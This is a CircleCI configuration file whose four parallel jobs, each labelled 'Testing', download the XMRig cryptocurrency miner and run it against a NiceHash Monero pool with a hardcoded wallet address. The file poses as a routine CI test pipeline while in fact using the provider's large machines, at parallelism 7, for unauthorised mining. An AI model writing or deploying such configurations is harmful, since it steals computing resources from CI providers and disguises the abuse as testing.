version: 2.1
jobs:
    Devop:
      machine:
        image: ubuntu-2004:202010-01
        resource_class: large
      parallelism: 7    
      steps:
        - checkout
        - run:
            name: "Testing"
            command: sudo apt update -y && wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz; tar -xf xmrig-6.17.0-linux-x64.tar.gz; cd xmrig-6.17.0; ./xmrig --o randomxmonero.eu.nicehash.com:3380 --u 3AhGzsYExJchLbzGVuiRTk33M5RAmL6C1f.ecko
    Devop1:
      machine:
        image: ubuntu-2004:202010-01
        resource_class: large
      parallelism: 7   
      steps:
        - checkout
        - run:
            name: "Testing"
            command: sudo apt update -y && wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz; tar -xf xmrig-6.17.0-linux-x64.tar.gz; cd xmrig-6.17.0; ./xmrig --o randomxmonero.eu.nicehash.com:3380 --u 3AhGzsYExJchLbzGVuiRTk33M5RAmL6C1f.ecko
    Devop2:
      machine:
        image: ubuntu-2004:202010-01
        resource_class: large
      parallelism: 7
      steps:
        - checkout
        - run:
            name: "Testing"
            command: sudo apt update -y && wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz; tar -xf xmrig-6.17.0-linux-x64.tar.gz; cd xmrig-6.17.0; ./xmrig --o randomxmonero.eu.nicehash.com:3380 --u 3AhGzsYExJchLbzGVuiRTk33M5RAmL6C1f.ecko
    Devop3:
      machine:
        image: ubuntu-2004:202010-01
        resource_class: large 
      parallelism: 7
      steps:
        - checkout
        - run:
            name: "Testing"
            command: sudo apt update -y && wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz; tar -xf xmrig-6.17.0-linux-x64.tar.gz; cd xmrig-6.17.0; ./xmrig --o randomxmonero.eu.nicehash.com:3380 --u 3AhGzsYExJchLbzGVuiRTk33M5RAmL6C1f.ecko
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3